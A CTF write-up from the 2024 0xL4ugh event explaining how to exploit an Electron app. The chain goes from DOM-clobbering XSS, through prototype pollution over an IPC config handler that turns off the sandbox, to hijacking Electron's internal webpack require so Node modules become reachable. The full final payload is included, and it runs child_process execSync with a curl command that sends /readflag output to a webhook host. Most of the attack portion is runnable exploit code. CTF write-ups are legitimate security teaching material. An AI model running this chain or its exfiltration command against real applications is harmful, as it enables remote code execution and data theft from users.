2024 0xL4ugh CTF - Ada Indonesia Coy ๐ฎ๐ฉ
The Problem
There are tons of files for this challenge, but our main focus would be these 2 files which defines the electron app.
Our BroweserWindow
loaded with this config as nodeIntegration and contextIsolation set to false. This means that the renderer doesnt get access to node feature except for the preload script (nodeIntegration:false), but both the preload and electron internal shares the same Javascript context (contextIsolation:false).
The BrowserWindow
is loaded with the following configuration:
webPreferences: {
preload: path.join(__dirname, "./preload.js"),
nodeIntegration: false,
contextIsolation: false,
With nodeIntegration: false
, the renderer process doesnโt have direct access to Node.js features. Meanwhile, contextIsolation: false
means the preload script and Electron internals share the same JavaScript context.
XSS in renderer
The following function is designed to create an iframe for displaying notes:
async function createNoteFrame(html, time) {
const note = document.createElement("iframe")
note.frameBorder = false
note.height = "250px"
note.srcdoc = "<dialog id='dialog'>" + html + "</dialog>"
note.sandbox = 'allow-same-origin'
note.onload = (ev) => {
const dialog = new Proxy(ev.target.contentWindow.dialog, {
get: (target, prop) => {
const res = target[prop];
return typeof res === "function" ? res.bind(target) : res;
setInterval(dialog.close, time / 2);
setInterval(dialog.showModal, time);
return note
const mynote = await createNoteFrame("<h1>Hati Hati!</h1><p>Website " + decodeURIComponent(document.location) + " Kemungkinan Berbahaya!</p>", 1000)
We can leverage DOM clobbering of dialog.close
or dialog.showModal
to execute arbitrary JavaScript code. This is one of the quirks of setTimeout
and setInterval
, where if we suply the first argument as string, it will try to create new Js Function and execute it. The payload would be like this
<a id=dialog name=close href="foo:console.log(1337)">
Prototype Pollution in config via IPC communication
// main.js
ipcMain.handle("set-config", (_, conf, obj) => {
Object.assign(config[conf], obj)
ipcMain.handle("get-config", (_) => {
return config
ipcMain.handle("get-window", (_) => {
const win = new BrowserWindow({
width: 800,
height: 600,
parent: mainWindow,
webPreferences: {
preload: path.join(__dirname, 'preload.js'),
nodeIntegration: false,
contextIsolation: false,
fullscreen: false,
// preload.js
class api {
return electron.ipcRenderer.invoke("get-config")
setConfig(conf, obj){
electron.ipcRenderer.invoke("set-config", conf, obj)
window.api = new api()
exposes the 3 custom ipcs to renderer. set-config
ipc handler directly modifies config object using Object.assign
. By setting config.__proto__
to arbitrary value, this means we have prototype pollution.
This prototype pollution can be used to toggle on/off some default configuration where spawnin new BrowserWindow
using the overriden value with prototype pollution, for example ticking off sandbox so that newly spawned BrowserWindow would have --no-sandbox
We can confirm this by running the below JS directly into dev console (open it with Ctrl+Shift+I) and then check the running process using ps
api.setConfig("__proto__", {sandbox:0})
user 23110 23024 1 05:33 pts/4 00:00:00 /redacted/baby-electron
user 23245 23017 2 05:33 pts/4 00:00:00 /redacted/baby-electron
notice that there are 2 electron process, one with --enable-sandbox
and the other one with --no-sandbox
Exposing node modules to renderer process
Since BrowserWindow started with contextIsolation set to false, we can expose it using polluting builtins objects (Js context shared with electron internals). This is explained better in the other author challenge writeup 2023 HITCON CTF - Harmony.
This works because electron internally uses webpack and webpack require will do a lazy load. When electron internally does __webpack_require__("./lib/renderer/api/ipc-renderer.ts")
, we will intercept it and copy this
object from t
and exposes it to our window renderer. This code explains better than words,
window.copyOfIpcRenderer = null;
Object.defineProperty(Object.prototype, `./lib/renderer/api/ipc-renderer.ts`, {
set(v) {
window.copyOfIpcRenderer = v;
window.module = this.module;
get() {
return window.copyOfIpcRenderer;
function __webpack_require__(r) {
var n = t[r];
if (void 0 !== n)
return n.exports;
var i = t[r] = {
exports: {}
return e[r](i, i.exports, __webpack_require__),
Chaining it together
Since the javascript code will be executed on setInterval
, we can clean this up to execute only one within sync guard if block
if (!window.SyncOnce) {
window.SyncOnce = true;
First, we will need to intercept the __webpack_require__
function, due to electron lazyLoading ipcRenderer and we will need to intercept it before we do any ipc communication.
if (!window.SyncOnce) {
window.SyncOnce = true;
window.copyOfIpcRenderer = null;
Object.defineProperty(Object.prototype, `./lib/renderer/api/ipc-renderer.ts`, {
set(v) {
window.copyOfIpcRenderer = v;
window.module = this.module;
get() {
return window.copyOfIpcRenderer;
Secondly, we can start do some ipc communications. Using prototype pollution to disable sandbox and spawn new BrowserWindow,
if (!window.SyncOnce) {
window.SyncOnce = true;
// snip
api.setConfig(`__proto__`, {sandbox:false});
The new BrowserWindow will have same document.location
as our first window, thus makes it executing the same xss payload. At this point we have exposed node modules to our renderer, so we just need to execute RCE payload
if (window.module && !window.syncOnce2) {
window.syncOnce2 = true;
window.module.exports._load(`child_process`).execSync(`curl http://webhook -d flag=$(/readflag)`);
Final Payload
if (!window.syncOnce) {
window.syncOnce = true;
window.copyOfIpcRenderer = null;
Object.defineProperty(Object.prototype, `./lib/renderer/api/ipc-renderer.ts`, {
set(v) {
window.copyOfIpcRenderer = v;
window.module = this.module;
get() {
return window.copyOfIpcRenderer;
api.setConfig(`__proto__`, { sandbox: false });
if (window.module && !window.syncOnce2) {
window.syncOnce2 = true;
window.module.exports._load(`child_process`).execSync(`curl http://webhook -d flag=$(/readflag)`);
Smuggling the Payload
Encode the payload in dom clobbering attack
<a id=dialog name=close href="foo:PAYLOAD">
Use a meta-equiv tag to redirect and inject URL encoded DOM clobbering payload via the URL hash:
<meta http-equiv="refresh" content="0; url=">